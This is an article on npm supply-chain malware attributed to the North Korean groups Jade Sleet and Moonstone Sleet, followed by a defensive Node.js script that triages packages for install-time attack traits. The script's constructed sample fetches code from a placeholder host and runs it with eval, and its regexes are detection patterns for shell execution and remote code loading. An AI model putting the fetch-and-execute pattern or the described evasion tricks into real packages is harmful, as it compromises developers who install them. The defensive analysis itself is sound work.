Despite efforts to expose supply chain attacks through the open-source npm registry by North Korean actors like Jade Sleet, new malicious packages continued to appear in late 2023 and early 2024.
Initially thought to be a continuation of Jade Sleet’s campaign, further investigation revealed a new threat actor, Moonstone Sleet.
Moonstone Sleet employs similar tactics, distributing malware through malicious npm packages on the public registry. This endangers a large pool of developers and highlights the persistent threat that actors like Moonstone Sleet and Jade Sleet pose to the open-source software supply chain.
Microsoft identified a new North Korean threat actor, Moonstone Sleet, that uses tactics, techniques, and procedures (TTPs) similar to those of other North Korean actors, for both financial gain and espionage.
Moonstone Sleet leverages malicious npm packages to target companies; these packages resemble previously identified ones that were distributed through freelancing platforms and LinkedIn.
Notably, it also uploads malicious packages to the public npm registry, giving it a far wider reach and potentially infecting unsuspecting developers who install them.
Differences in Code Style and Structure
An analysis of malicious npm packages reveals a shift in coding practices, where packages linked to Jade Sleet, discovered in spring and early summer 2023, differ in style and structure from those associated with the Moonstone Sleet group, active in late 2023 and early 2024.
This shift suggests that the two groups employ distinct strategies when targeting the open-source software supply chain. By examining these code variations, we can gain valuable insight into the evolving tactics used to compromise software through malicious packages.
To evade detection, Jade Sleet, a threat actor with ties to North Korea, split its malicious code across multiple npm packages in summer 2023.
The first package created a directory on the victim's machine and downloaded "updates" from a remote server into that directory, preparing the system for the second package, which delivered the final malicious payload.
The attack works in two parts: the first package generates a token and stores it in a file; the second package reads that token, makes a request to a URL with the token as a parameter, and downloads the response, which likely contains malicious code.
According to Checkmarx, the second package executes the downloaded content directly as a Node.js script, enabling full malicious functionality.
Moonstone Sleet, a hacking group, changed its npm package attack strategy in mid-2024. Its earlier packages delivered the payload in a single, streamlined step at install time and targeted only Windows.
Those packages carried malicious code encoded within strings and executed only on Windows machines. In the second quarter of 2024, however, the group's packages became more complex, using obfuscation and targeting both Windows and Linux systems.
The new payload flow downloads a file, decrypts it, renames it, and executes it, then deletes the temporary files and replaces the malicious code with a clean version.
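The install-time behaviours described above (a lifecycle hook, a platform gate, a large encoded string, a remote fetch whose response is executed, and self-cleaning file operations) are exactly what a defender can triage a package for before it reaches a build host. The following Node.js script is an added example written for this article, not code from Microsoft, Checkmarx or any of the packages discussed; the package name, file contents and heuristic names are constructed.

```javascript
// Added example (not from the original article): heuristic triage of an npm
// package for the install-time tricks described above. Sample inputs are
// constructed and hypothetical; the regexes are deliberately coarse.
const SIGNS = {
  lifecycleScript: /^(pre|post)?install$/,                       // runs on npm install
  platformGate:   /process\.platform\s*===?\s*['"](win32|linux)['"]/,
  encodedBlob:    /['"`][A-Za-z0-9+\/=]{200,}['"`]/,                // long base64-like string
  remoteFetch:    /\b(https?\.(get|request)|fetch|axios)\s*\(/,
  dynamicExec:    /\b(eval|new Function|vm\.runInThisContext)\s*\(/, // runs downloaded text
  shellExec:      /child_process|\b(exec|execSync|spawn)\s*\(/,
  selfClean:      /\b(unlinkSync|rmSync|writeFileSync)\s*\(/,        // delete/overwrite own files
};

// pkgJson: parsed package.json; files: map of path -> source text.
// Returns a list of human-readable findings (empty = nothing flagged).
function triagePackage(pkgJson, files) {
  const findings = [];
  const scripts = pkgJson.scripts || {};
  for (const hook of Object.keys(scripts).filter(k => SIGNS.lifecycleScript.test(k))) {
    findings.push(`lifecycle hook "${hook}": ${scripts[hook]}`);
  }
  for (const [path, text] of Object.entries(files).filter(([p]) => p.endsWith('.js'))) {
    for (const [name, re] of Object.entries(SIGNS)) {
      if (name !== 'lifecycleScript' && re.test(text)) findings.push(`${path}: ${name}`);
    }
  }
  return findings;
}

// Install-time code that fetches and executes remote content, or that gates on
// platform while carrying a large encoded blob, is rated 'high'.
function riskLevel(findings) {
  const has = s => findings.some(f => f.includes(s));
  const installTime = has('lifecycle hook');
  if (installTime && has('remoteFetch') && (has('dynamicExec') || has('shellExec'))) return 'high';
  if (installTime && has('platformGate') && has('encodedBlob')) return 'high';
  if (installTime && findings.length > 1) return 'medium';
  return findings.length ? 'low' : 'none';
}

// Constructed sample resembling the second-stage package described above.
const samplePkg = { name: 'example-stage2', scripts: { postinstall: 'node index.js' } };
const sampleFiles = {
  'index.js': [
    "if (process.platform === 'win32') {",
    "  https.get('https://example.invalid/update?token=' + token, r => {",
    "    let body = ''; r.on('data', d => body += d);",
    "    r.on('end', () => eval(body));", // downloaded response run as a script
    "  });", "}",
  ].join('\n'),
};
console.log(riskLevel(triagePackage(samplePkg, sampleFiles))); // prints: high
```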